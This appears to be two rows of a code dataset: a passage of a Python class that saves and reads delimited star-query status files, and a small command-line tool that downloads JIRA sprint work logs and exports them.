This example generates all stars which passed thru filtering
Returns
-------
list
Returns all queries with desired status
'''
status_dict = self._getDictQuery(
self.status_header, self.status_queries)
return sub_dict_in_dict(stat, status_dict, ["passed", "filtered", "found"])
def getQueries(self):
'''
Get status file as list of queries
Returns
-------
list
List of dictionary queries
'''
return self._getDictQuery(self.status_header, self.status_queries)
@classmethod
def save_query(self, query, fi_name="query_file.txt", PATH=".", DELIM=None,
overwrite=False):
'''
Save queries into the file which can be loaded for another query
Parameters
----------
query : list
List of dictionaries which contains query params
Returns
-------
None
'''
header = list(query[0].keys())
path = os.path.join(PATH, fi_name)
if not DELIM:
DELIM = self.DELIMITER
try:
if overwrite:
query_file = open(path, "w+")
else:
query_file = open(path, "a+")
except IOError as err:
raise InvalidFilesPath(err)
n = len(header)
if not query_file.readline().startswith("#"):
query_file.write("#")
for i, head in enumerate(header):
delim = DELIM
if i >= n - 1:
delim = ""
query_file.write(head + delim)
query_file.write("\n")
for que in query:
if len(que) != len(header):
raise Exception(
"Number of header params and values have to be the same.\nGot query %s and header %s \nCheck the query file if there are no missing value in any column or if there is a whitespace." % (que, header))
for i, key in enumerate(que):
delim = DELIM
if i >= n - 1:
delim = ""
query_file.write(str(que[key]) + delim)
query_file.write("\n")
query_file.close()
@classmethod
def save_lists_query(self, query=[], fi_name="query_file.txt", PATH=".", DELIM=None,
overwrite=False, header=None):
'''
Save queries into the file which can be loaded for another query
Parameters
----------
query : list
List of lists which contains
Returns
-------
None
'''
path = os.path.join(PATH, fi_name)
if not DELIM:
DELIM = self.DELIMITER
if not check_depth(query, 2, ifnotraise=False):
query = [query]
if not header and query[0]:
return False
try:
if overwrite:
query_file = open(path, "w+")
else:
query_file = open(path, "a+")
except IOError as err:
raise InvalidFilesPath(err)
if header and not query_file.readline():
query_file.write(
"#" + DELIM.join([str(it) for it in header]))
for line in query:
query_file.write(DELIM.join([str(it) for it in line]) + "\n")
query_file.close()
@staticmethod
def get_with_status(queries, stat={"passed": True}):
'''
Return all queries with desired status
Parameters
----------
stat : dict
Dictionary with status column name and its value
queries : list
List of query dictionaries
Returns
-------
list
Returns all queries with desired status
'''
return sub_dict_in_dict(stat, queries)
def _readFile(self, path):
'''Get header and data from the file'''
header = self._readHeader(path)
data = self._getFileData(path)
# data = np.genfromtxt(path,dtype="|S5", delimiter = self.DELIMITER)
# data = self._correctData(data, header)
if len(header) != len(data[0]):
raise Exception(
"Number of header params and values have to be the same.\nGot %s and %s" % (data[0], header))
return header, data
def _readHeader(self, status_file_path):
'''Get keys from header in a list'''
with open(status_file_path, 'r') as f:
# Skip first symbol ('#') and the '\n'
header_line = f.readline()[1:].rstrip('\n')
return [head.strip() for head in header_line.split(self.DELIMITER)]
def _getDiff(self, desir_dicts, comp_dicts):
'''Get dictionaries from list of desir_dicts which is not present list of comp_dicts'''
diff_dicts = []
for query in desir_dicts:
if not query in comp_dicts:
diff_dicts.append(query)
return diff_dicts
def _getDictQuery(self, header, queries):
'''Get header list and contents of the status file as list of dictionaries'''
queries_list = []
for query in queries:
if type(query) is not np.ndarray and type(query) is not list:
query = [query]
queries_list.append(dict(list(zip(header, query))))
return queries_list
def _readInStr(self, words):
ENUM_SEP = ","
x = []
for word in words:
if ENUM_SEP in str(word):
x.append(word.split(ENUM_SEP))
else:
try:
x.append(ast.literal_eval(word.strip()))
except:
x.append(word)
return x
def _correctData(self, data, header):
try:
len(data[0])
assert not isinstance(data[0], str)
except:
# Check if just one value
try:
len(data)
except:
return [[data]]
# One line
if len(data) == len(header):
return [data]
# One column
else:
return [[i] for i in data]
return data
def _getFileData(self, path):
fi = open(path)
data = []
for line in fi.readlines():
line = line.strip()
if not line.startswith("#"):
parts = line.split(self.DELIMITER)
parts = self._readInStr(parts)
data.append(parts)
fi.close
return data
|
import getpass
import pickle
import sys
from domain import exceptions
from domain.config import Config, CredentialsConfig
from domain.sprint import Sprint
from export.exporter_factory import create_exporter
from communication.jira_agent import JiraAgent
from shell.argument_parser import ArgumentParser
from shell.config_manager import ConfigManager
def run():
try:
argument_parser = ArgumentParser(sys.argv)
if not argument_parser.parse():
return
config = load_configuration(argument_parser.config_file_path)
sprint = load_data(argument_parser, config)
if argument_parser.raw_data_target:
save_data(sprint, argument_parser.raw_data_target)
print('Exporting data...')
export_result(
sprint,
argument_parser.output_file_path,
config.export,
argument_parser.export_format)
print(F'Data exported successfully.')
except exceptions.ArgumentParserException as exception:
print(str(exception))
argument_parser.print_help()
sys.exit(1)
except exceptions.ConfigManagerException as exception:
print(str(exception))
sys.exit(2)
except exceptions.InvalidConfigException as exception:
print(F'Configuration is invalid. {exception}')
sys.exit(2)
def load_configuration(config_file_path):
config_manager = ConfigManager(config_file_path)
return config_manager.load()
def load_data(argument_parser, config):
if argument_parser.raw_data_source:
return load_data_from_file(argument_parser.raw_data_source)
return download_data(config, argument_parser.jira_board_id, argument_parser.jira_sprint_name)
def load_data_from_file(file_path):
print('Loading data from file...')
with open(file_path, 'rb') as pkl_file:
return pickle.load(pkl_file)
def download_data(config, jira_board_id, jira_sprint_name):
config = verify_credentials(config)
print('Connecting to JIRA...')
agent = connect_to_jira(config)
print('Retrieving sprint ID...')
sprint_id = retreive_sprint_id(agent, jira_board_id, jira_sprint_name)
print('Retrieving sprint info...')
sprint_info = agent.retrieve_sprint_info(sprint_id)
print('Downloading issues and work logs...')
return Sprint(sprint_info, agent.download_work_log_of_sprint(sprint_id))
def save_data(sprint, file_path):
print(F'Saving raw data to {file_path}...')
with open(file_path, 'wb') as output:
pickle.dump(sprint, output)
def verify_credentials(config):
username = config.credentials.username
password = config.credentials.password
if username and password:
return config
(username, password) = ask_for_credentials(username, password)
credentials_config = CredentialsConfig(username, password)
config = Config(config.general, credentials_config, config.export)
return config
def ask_for_credentials(username, password):
if not username:
username = input('Username: ')
password = getpass.getpass()
elif not password:
password = getpass.getpass()
return username, password
def connect_to_jira(config):
agent = JiraAgent(config.general.server_url, config.credentials.username, config.credentials.password)
agent.connect()
return agent
def retreive_sprint_id(agent, board_id, sprint_name):
sprint_id = agent.retrieve_sprint_id(board_id, sprint_name)
if sprint_id == '':
raise Exception(F'Cannot find JIRA sprint with name "{sprint_name}".')
return sprint_id
def export_result(sprint_data, output_path, export_config, export_format):
exporter = create_exporter(export_format, export_config)
exporter.export(output_path, sprint_data)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.